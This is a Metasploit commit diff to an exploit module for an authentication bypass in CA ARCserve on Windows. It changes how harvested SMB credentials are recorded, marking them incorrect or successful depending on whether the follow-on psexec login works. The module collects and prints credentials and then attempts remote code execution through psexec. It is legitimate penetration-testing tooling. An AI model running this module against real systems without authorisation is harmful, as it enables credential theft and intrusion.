Trying to report more accurate status

jvazquez-r7 · jvazquez-r7 · commit 357a3929a373 · 2015-06-19T09:51:36.000-05:00
diff --git a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
@@ -78,7 +78,7 @@ def report_cred(opts)
 
     login_data = {
       core: create_credential(credential_data),
-      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      status: opts[:status]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -145,15 +145,6 @@ def exploit
 
     print_good("Collected credentials User: '#{user}' Password: '#{pass}'")
 
-    # report the auth
-    report_cred(
-      ip: datastore['RHOST'],
-      port: 445,
-      service_name: 'smb',
-      user: user,
-      password: pass
-    )
-
     # try psexec on the remote host
     psexec = framework.exploits.create("windows/smb/psexec")
     psexec.register_parent(self)
@@ -182,11 +173,31 @@ def exploit
         'RunAsJob' => true
       )
     rescue
+      report_cred(
+        ip: datastore['RHOST'],
+        port: 445,
+        service_name: 'smb',
+        user: user,
+        password: pass,
+        status: Metasploit::Model::Login::Status::INCORRECT
+      )
+
       print_status("Login attempt using windows/smb/psexec failed")
       print_status("Credentials have been stored and may be useful for authentication against other services.")
+      # report the auth
       return
     end
 
+    # report the auth
+    report_cred(
+      ip: datastore['RHOST'],
+      port: 445,
+      service_name: 'smb',
+      user: user,
+      password: pass,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL
+    )
+
     handler
   end
 end
